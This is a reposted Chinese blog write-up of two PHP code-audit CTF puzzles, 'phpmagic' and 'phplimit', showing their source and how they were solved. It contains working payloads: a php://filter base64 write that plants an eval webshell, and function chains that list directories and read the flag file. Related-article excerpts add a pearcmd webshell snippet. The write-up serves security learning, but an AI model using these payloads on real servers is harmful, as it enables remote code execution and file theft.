p神 代码审计知识星球二周年wp[2]

最新推荐文章于 2022-12-16 20:11:25 发布
最新推荐文章于 2022-12-16 20:11:25 发布
阅读量773 收藏
点赞数
文章标签: php 操作系统
原文链接:https://yq.aliyun.com/articles/676229
版权

参考文献:https://m3lon.github.io/2018/05/29/RCTF-r-cursive-wp/
http://f1sh.site/2018/11/25/code-breaking-puzzles%e5%81%9a%e9%a2%98%e8%ae%b0%e5%bd%95/
递归匹配:http://www.laruence.com/2011/09/30/2179.html

easy - phpmagic

源码

<?php
if(isset($_GET['read-source'])) {
    exit(show_source(__FILE__));
}
define('DATA_DIR', dirname(__FILE__) . '/data/' . md5($_SERVER['REMOTE_ADDR']));
if(!is_dir(DATA_DIR)) {
    mkdir(DATA_DIR, 0755, true);
}
chdir(DATA_DIR);
$domain = isset($_POST['domain']) ? $_POST['domain'] : '';
$log_name = isset($_POST['log']) ? $_POST['log'] : date('-Y-m-d');
?>
<!doctype html>
<html lang="en">
<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/css/bootstrap.min.css" integrity="sha256-eSi1q2PG6J7g7ib17yAaWMcrr5GrtohYChqibrV7PBE=" crossorigin="anonymous">
    <title>Domain Detail</title>
    <style>
    pre {
        width: 100%;
        background-color: #f6f8fa;
        border-radius: 3px;
        font-size: 85%;
        line-height: 1.45;
        overflow: auto;
        padding: 16px;
        border: 1px solid #ced4da;
    }
    </style>
</head>
<body>
<div class="container">
    <div class="row">
        <div class="col">
            <form method="post">
                <div class="input-group mt-3">
                    <div class="input-group-prepend">
                        <span class="input-group-text" id="basic-addon1">dig -t A -q</span>
                    </div>
                    <input type="text" name="domain" class="form-control" placeholder="Your domain">
                    <div class="input-group-append">
                        <button class="btn btn-outline-secondary" type="submit">执行</button>
                    </div>
                </div>
            </form>
        </div>
    </div>
    <div class="row">
        <div class="col">
            <pre class="mt-3"><?php if(!empty($_POST) && $domain):
                $command = sprintf("dig -t A -q %s", escapeshellarg($domain));
                $output = shell_exec($command);
                $output = htmlspecialchars($output, ENT_HTML401 | ENT_QUOTES);
                $log_name = $_SERVER['SERVER_NAME'] . $log_name;
                if(!in_array(pathinfo($log_name, PATHINFO_EXTENSION), ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'], true)) {
                    file_put_contents($log_name, $output);
                }
                echo $output;
            endif; ?></pre>
        </div>
    </div>
</div>
</body>
</html>

解题思路
能控制文件名和文件内容,但是文件内容被htmlspecialchars函数过滤了一次,尖括号没了。PHP的一个特点:只要是传filename的地方,基本都可以传协议流。而file_put_contents的第一个参数就是传filename的地方
一个简单的栗子

img_3b1d48d64115122da6af00a20e8c2703.png

利用php伪协议流解码base64写入webshell
其他问题

  • 后缀名将能解析php文件的全禁止了
  • $log_name之前会加上$_SERVER['SERVER_NAME'],不完全可控文件名
  • 文件内容也不完全可控

解决方法

  • 一个可以在windows和linux上都行得通的方法:
filename=1.php/.&content=<?php phpinfo();?>

在操作系统中,都是禁止使用/作为文件名的,但是后面加一个.就可以成功的写入1.php了。pathinfo就取不到后缀名,可以正常写入.php之中。且无论是在windows上还是linux上,每次都只可以创建新文件,不能覆盖老文件

  • $_SERVER['SERVER_NAME']取的是HTTP headers中的Host的值。md5($_SERVER['REMOTE_ADDR'])是自己本机外网ip的md5值
    img_74e7826714b4c9301ea10f07102724e9.png

    img_373b317e34dc7049df94c499602ed08b.png

最终payload

domain=PD9waHAgZXZhbCgkX1BPU1RbMTJdKTs/Pg&log=://filter/write=convert.base64-decode/resource=6.php/.
  • 在p神的环境上可以直接成功。但是在本机上测试的时候,写入的文件一直是乱码,后来经大佬提醒才知道还需填充字符串。(左边是p神的环境,右边是自己的)
    img_0e00325b1fb35e8b7e4b0ee4161ab5ed.png

    在自己本机上的payload 
domain=aaaPD9waHAgZXZhbCgkX1BPU1RbMTJdKTs/Pg&log=://filter/write=convert.base64-decode/resource=8.php/.
easy - phplimit

源码

<?php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
} else {
    show_source(__FILE__);
}

解题思路

\W:任意个非单词字符。匹配非字母、数字、下划线。等价于 `[^A-Za-z0-9_]`
?: 匹配前面的子表达式零次或一次,或指明一个非贪婪限定符。要匹配 ? 字符,请使用 \?
\((?R)?\):(?R)*表示, 正则式本身, 可以认为是:`(正则本身(正则本身).....)`。

那么此题最终的正则匹配就是可以递归执行函数,不可以带参数。
php函数

getcwd ():取得当前工作目录
dirname():给出一个包含有指向一个文件的全路径的字符串,本函数返回去掉文件名后的目录名。
chdir():改变当前的目录。
scandir(directory):返回一个 array,包含有 `directory` 中的文件和目录
readdir ():返回目录中下一个文件的文件名。文件名以在文件系统中的排序返回
array_reverse() :接受数组 array 作为输入并返回一个单元为相反顺序的新数组
next():它返回的是下一个数组单元的值并将数组指针向前移动了一位。
get_defined_vars ():返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。 
reset():将 array 的内部指针倒回到第一个单元并返回第一个数组单元的值。

不带参数的一些函数组合

?code=print(phpinfo());
?code=print(readdir(opendir(getcwd())));                  #列目录
?code=print(readfile(readdir(opendir(getcwd()))));         #读文件
?code=print(dirname(dirname(getcwd())));      #print出/var
?code=eval(implode(getallheaders()));    #apache模块的函数
?code=eval(implode(get_defined_vars()));

最终payload

?code=readfile(implode(array_reverse(scandir(dirname(chdir(dirname(getcwd()))))))); #查看当前文件夹
?code=readfile(next(array_reverse(scandir(dirname(chdir(dirname(getcwd())))))));

或者

?1=readfile("../flag_phpbyp4ss");//&code=eval(implode(reset(get_defined_vars())))
img_1ac99dbe70873e86519ef471b9d72baa.png
weixin_33852020
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
p 代码审计知识星球周年wp[1]
weixin_34372728的博客
11-27 2010
题目:https://code-breaking.com 参考文献:https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.htmlhttps://blog.csdn.net/while0/artic...
Audit-Learning:记录自己对《代码审计》的理解和总结,对危险函数的深入分析以及在p牛的博客和代码审计圈的收获
02-01
Audit-Learning:记录自己对《代码审计》的理解和总结,对危险函数的深入分析以及在p牛的博客和代码审计圈的收获
《Python代码审计》(1)一款超好用的代码扫描工具
午夜安全
12-16 2253
从本文开始,我将开始介绍Python源代码审计代码审计是检查源代码中的安全缺陷,检查源代码是否存在安全隐患,或者编码不规范的地方。通常使用自动化工具或者人工审查的方式,自动化工具效率高,但是误报率也高,并且发现的问题不够深入、全面;人工审查的方式可以全面深入的发现源代码中的安全缺陷,缺点是耗时较长。
PHP代码审计(全)
sechelper的博客
12-07 3784
PHP代码审计全流程,黑白盒测试,小技巧,实操案例
【安全】P 2-22 SQL注入漏洞简单挖掘 - 代码审计挖掘0day
Z_David_Z的博客
02-15 236
目录0X01 CMS环境搭建(espcms)0X02 自动化审计工具0X03 直接挖掘select注入0X04 漏洞验证POC 0X01 CMS环境搭建(espcms) 完成搭建 下载地址:(已上传,稍后补充) 0X02 自动化审计工具 作者网站现在已经无法访问:http://www.cnseay.com/ 下载地之一 [下载地址]() 点击“新建项目”,打开espcms目录,再点:自动审计->开始 0X03 直接挖掘select注入 已这条漏洞提示为例 双击达到位置 par
代码审计从入门到放弃() & pcrewaf
蚁景网安学院
03-19 429
前言 继续之前的2018 Code Breaking,这次是一道关于php回溯bypass正则的题目:pcrewaf 题目概述 题目源码如下 <?php function is_php($data){ return preg_match('/<\?.*[(`;?>].*/is', $data); } if(empty($_FILES)) { die(show_so...
wp开发代码2-6
01-14
在本压缩包文件“wp开发代码2-6”中,我们涵盖了WordPress(简称wp)开发的四个关键章节:第2章、第4章、第5章和第6章。WordPress是一个广泛使用的开源内容管理系统,主要用于构建网站和博客。开发者通过编写代码...
Android sp&wp 测试代码
11-09
总之,`Android sp&wp 测试代码`项目旨在帮助开发者理解SharedPreferences和WakeLock的底层实现,通过C语言的角度揭示Android系统的一部分工作原理。通过学习和实践,可以加深对Android系统如何管理数据存储和电源...
wpform.professional.v2.10.fws.rar_Professional_V2 _wp
09-19
【标签】"professional v2_ wp" 明确了这个版本是一个升级版,"v2"代表第版,意味着相比之前版本,它可能包含了一系列改进和新特性,增强了用户体验和性能。同时,标签中的"wp"再次强调了这款工具是专门为...
WP.NET .NET版WordPress源代码
03-18
WP.NET 可以让 WordPress 完全在 ASP.NET 环境中运行,开发者可使用,可以很方便的跟现有 .NET 应用集成。该项目使用 Phalanger 将 PHP 编译成 .NET 代码。 注意事项:需要.net 4.0,安装时请在应用池设置,还需要...
P-Java安全漫谈
最新发布
04-20
Java安全是指在Java编程和应用开发过程中采取的一系列措施,旨在保护Java应用程序、系统和数据免受恶意攻击、数据泄露和其他安全威胁的影响。Java安全主要涉及以下几个方面: 代码安全性:Java提供了强大的安全机制,如访问控制、类加载验证、沙箱模型等。这些机制确保代码在运行时不会执行恶意操作或访问未经授权的资源。 身份认证和访问控制:Java安全包括用户身份认证和授权机制,以确保只有经过验证的用户可以访问受限资源。常见的身份认证方式包括用户名密码验证、令牌(Token)验证和双因素认证等。 数据加密和传输安全:Java提供了丰富的加密算法和API,可用于对敏感数据进行加密,以保护数据的隐私和完整性。同时,Java还支持安全的网络传输协议,如HTTPS,以确保数据在传输过程中的安全性。 安全漏洞和漏洞修复:Java安全也涉及对已知安全漏洞的修复和防范。Java开发人员需要及时更新和升级Java平台和相关组件,以确保应用程序不受已知漏洞的影响。 安全审计和监控:Java应用程序的安全性还需要进行定期的审计和监控,以检测异常行为、潜在的攻击和安全事件。安全审计和监控工具可以帮
RedTeaming2020:RedTeaming知识星球2020年安全知识汇总
03-08
RedTeaming知识星球2020年安全知识汇总 时间能量有限,本来想按照分类来发布星球内容的。比如这样 ## 免杀 xxx xxx ## 渗透技巧 xxx xx 按照时间顺序我把2020年星球大家讨论的知识点共享出来,希望会有帮助。知识不足体系,2021年会我每个月会细化标签,弄一个单独的网站进行共享。 zsxq搜索:RedTeaming RedTeaming-2020-01-06 #Tools# #c2# RedTeaming-2020-01-06 #Bypass Waf# img标签被拦截,src也被禁止了,最后构造出<image xss=removed xss=removed> RedTeaming-2020-01-06 #RedTeam# RedTeaming-20
pblog 超轻量级个人博客系统 v1.0 beta
10-25
Pblog采用PHP和MYSQL开发的一个个人博客系统,只保留博客最基本的功能——写文章和留言,暂不考虑增加其它额外的功能。Pblog的导航使用动态脚本显示,内容页使用静态显示,极大的缓解因博客使用空间带来的“缓慢”问题。同时,Pblog没有采用任何PHP框架开发,都是原生开发,即使是PHP初学者也不难看懂源码,对它进行更改(我本身就是PHP的初学者)。Pblog的目标是:让天朝的空间都可以运行的博客。Pblog1.0测试版经过普通的zip解压后的大小是684kb——包括所有的代码和图片。但由于我本人没有经过什么系统的培训,也没有正式在公司呆过,采用的都是Copy和Paste的方式进行流水式开发(1.0测试版只用了不到三天进行开发,是我阅读了一点点WP的代码之后才产生的开发念头,我感觉WP——太臃肿了!算是我在大学最后一份“作业”吧),所以它还有很多需要完善的地方。 Pblog主要功能:发布博文这个不用多说,博客不能发博文还能叫博客吗?采用Kindeidtor作为编辑器,满足日常编辑的大部分功能。自动生成导读目录pblog会自动的从文章中提取h2、h3标签的内容,同时将它们整理成该文的
bugkctf 代码审计.md
04-01
学习的笔记,方便平时查看,bugkct代码审计wp,可以将我自己的见解分享给大家,使大家少走点弯路
一道代码审计
silence1_的博客
10-31 537
利用php伪协议写文件 题目是p的code-breaking中的phpmagic。 先?read-source=1可以读到源码 php内容为: <?php if(isset($_GET['read-source'])) { exit(show_source(__FILE__)); } define('DATA_DIR', dirname(__FILE__) . '/data/' ...
Go代码审计学习(
paidx0
12-12 806
Go代码审计学习(
幕布V1.1.9最新版漏洞集合
weixin_30677617的博客
04-22 473
0X00 前言 幕布本人最早接触是在P知识星球里面看到P推荐的,后来下了个用着还挺好用。 之前一直都放一些零零散散的笔记,最近整理的时候,一时兴起,本着漏洞源于生活的态度,遂对幕布的安全性做了些研究。 0x01 背景 幕布是一款头脑管理工具,用更高效的方式和清晰的结构来记录笔记、管理任务、制定工作计划、头脑风暴。用最好的方式释放您的大脑! 令人觉得舒服的是,就算...
2021湖湘杯
hezhing
12-08 3110
2021湖湘杯 只做了一个web,还是问了队友。misc三道题太难了。最后复盘做出来了一个。 web easywii 队友说是p知识星球中的内容。后来被人打烂了。 参考链接:Docker PHP裸文件本地包含综述 - 跳跳糖 (tttang.com) payload ?+config-create+/&name=cfile&value=/usr/local/lib/php/pearcmd.php&/<?=eval($_POST['a']);?>+/tm
javaSec-Servlet的线程安全问题
灰太的表格的博客
02-20 3640
javaSec-Servlet的线程安全问题 刚开始看见关于这的知识点是在p知识星球看见y4师傅发的,后来又看见了vnctf用了这个知识点,就简单的写下。 这里直接拿easyJava这题的题目环境当了demo: 刚开始有个任意文件读取,直接读Servlet文件反编译下先看HelloWorldServlet: // // Source code recreated from a .class file by IntelliJ IDEA // (powered by FernFlower decompile
WP8第章:新手友好 UI控件详解与继承图
WP8第章主要聚焦于用户界面(UI)控件的介绍和使用,对初学者极其有帮助。章节内容包括了基础控件、ToolKit控件以及事件管理的基础概念。 首先,章节从控件继承图开始,介绍了WP8中控件的层次结构,如`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值